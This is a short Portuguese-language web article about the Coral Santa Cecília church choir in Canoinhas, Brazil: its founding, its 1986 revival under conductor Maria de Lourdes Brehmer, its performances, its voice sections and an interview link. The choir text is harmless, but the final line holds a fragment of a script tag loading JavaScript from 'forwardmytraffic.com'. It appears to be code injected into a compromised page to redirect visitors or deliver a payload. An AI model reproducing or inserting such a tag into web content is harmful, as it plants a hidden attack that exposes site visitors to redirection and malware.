Numa conversa informal, saboreando um delicioso chá, a maestrina Maria de Lourdes Brehmer, fala sobre o Coral Santa Cecília. O Coral foi fundado em 1960, por Irmã Carolina Gross, educadora do Colégio Sagrado Coração de Jesus. O grupo cessou as atividades e a partir de 1986, retornou, sob coordenação da maestrina, com apoio do Frei Bernardo.
Início do Coral Santa Cecília
Além da participação mensal, nas missas da Igreja Matriz Cristo Rei (Canoinhas), o Coral faz apresentações em casamentos, aniversários, formaturas, festas nas comunidades e eventos socioculturais. Participou dos encontros de Corais nas cidades de Mafra, Porto União, Curitiba, São Mateus do Sul e Luzerna. No próximo dia 23 de setembro cantará na missa do Santuário de Santa Paulina (Nova Trento).
Apresentações do Coral Santa Cecília
Participando de um grupo do canto coral desenvolvemos habilidades pessoais, interpessoais e comunitárias. Em contrapartida, ao ouvirmos uma apresentação, enobrecemos a alma, vivenciamos a experiência da harmonia musical.
Apresentação na Matriz Cristo Rei 19/02/2017
Atualmente o Coral Santa Cecília é composto por 32 componentes, distribuídos em quatro naipes (soprano, contralto, tenor e baixo). Conta com os organistas Gustavo Drosdek, Luiz Felipe MarschalK e José Alfredo da Fonseca na beleza do toque do seu violão.
Para saber mais:
Entrevista completa disponível em: https://youtu.be/ESqBAImPSnY
… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>